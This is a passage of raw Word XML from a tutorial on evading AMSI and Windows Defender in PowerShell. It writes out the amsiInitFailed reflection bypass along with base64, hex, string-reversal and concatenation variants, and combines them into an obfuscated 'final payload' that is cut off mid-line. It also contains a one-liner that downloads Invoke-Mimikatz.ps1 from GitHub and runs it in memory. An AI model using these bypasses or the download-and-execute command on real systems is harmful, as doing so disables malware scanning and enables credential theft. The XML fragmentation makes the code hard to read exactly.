      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>amsiInitFailed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> also without triggering Defender.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Final Payload</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lastRenderedPageBreak/>
        <w:t>Now that we crafted the final payload to Patch AMSI, let us look back at the original AMSI bypass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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>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[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</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All we need to do now is replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>amsiInitFailed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the base64 encoded payload and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the rest of the string.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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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gramStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PS:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\&gt; [Ref].Assembly.GetType($('System.Management.Automation.')+$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('QQBtAHMAaQA=')))+$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VQB0AGkAbABzAA==')))).GetField($([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('YQBtAHMAaQA=')) + $([System.Text.Encoding]::Unicode.GetString($([System.Convert]::FromBase64String('SQBuAGkAdAA=')))) + $([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RgBhAGkAbABlAGQA')))),$('NonPublic,Static')).SetValue($null,$true)</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For confirmation, we can download and execute </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mimikatz.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the memory and check if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> triggering Defender.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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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IEX(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iwr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UseBasicParsing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</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As you can see, we successfully encoded the AMSI bypass payload in base64. Below I will give a demonstration on how to encode it in hex and use techniques like reverse string and concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC0CB"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Concatenation</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An easy was of bypassing </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> m s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> U t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> l s”</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is by simply splitting it into two words and adding them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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AmsiUtils</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'</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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Amsi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>' + '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Utils</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'</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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC0CB"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Hex Encoding</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A simple Hex encoding and decoding snippet in PowerShell looks like </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>this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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>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Encoding Payload</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"Hello World" | Format-Hex</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Decoding Payload</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xml:space="preserve">PS:\&gt; $r = '48 65 6C </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6C</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6F 20 57 6F 72 6C 64'.Split(" ")|</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>forEach</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>{[char]([convert]::toint16($_,16))}|</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>forEach</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">{$s=$s+$_} </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 C:\&gt; $s</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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC0CB"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Reverse String</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The last technique is by reversing the string for obfuscating the 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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>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Encoding Payload</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(([regex]::Matches("testing payload",'.','</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RightToLeft</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">') | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> {$_.value}) -join '')</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 Decoding Payload</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(([regex]::Matches("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>daolyap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gnitset</w:t>
            </w:r>
            <w:proofErr w:type="spell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RightToLeft</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">') | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> {$_.value}) -join '')</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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Final Payload - 2</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We can also combine these techniques to create a more powerful and effective payload that can evade detection by Windows Defender. Using a combination of Base64 Encoding, Hex Encoding, Reversing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> String, and Concatenation, we can create a highly obfuscated payload to bypass Windows Defender.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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>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PS:\&gt; $w = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>System.Manag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">';$r = '65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e'.Split(" ")|forEach{[char]([convert]::toint16($_,16))}|forEach{$s=$s+$_};$c = </w:t>
            </w:r>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Amsi</w:t>
            </w:r>
            <w:proofErr w:type="spell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Utils</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>';$assembly = [Ref].</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assembly.GetType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(('{0}{1}{2}' -f $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>w,$s,$c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>));$n = $([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('YQBtAA==')));$b = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>siIn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>';$k = (([regex]::Matches("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>deliaFti</w:t>
            </w:r>
            <w:proofErr w:type="spell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RightToLeft</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">') | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> {$_.value}) -join '');$field = $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>assembly.GetField</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
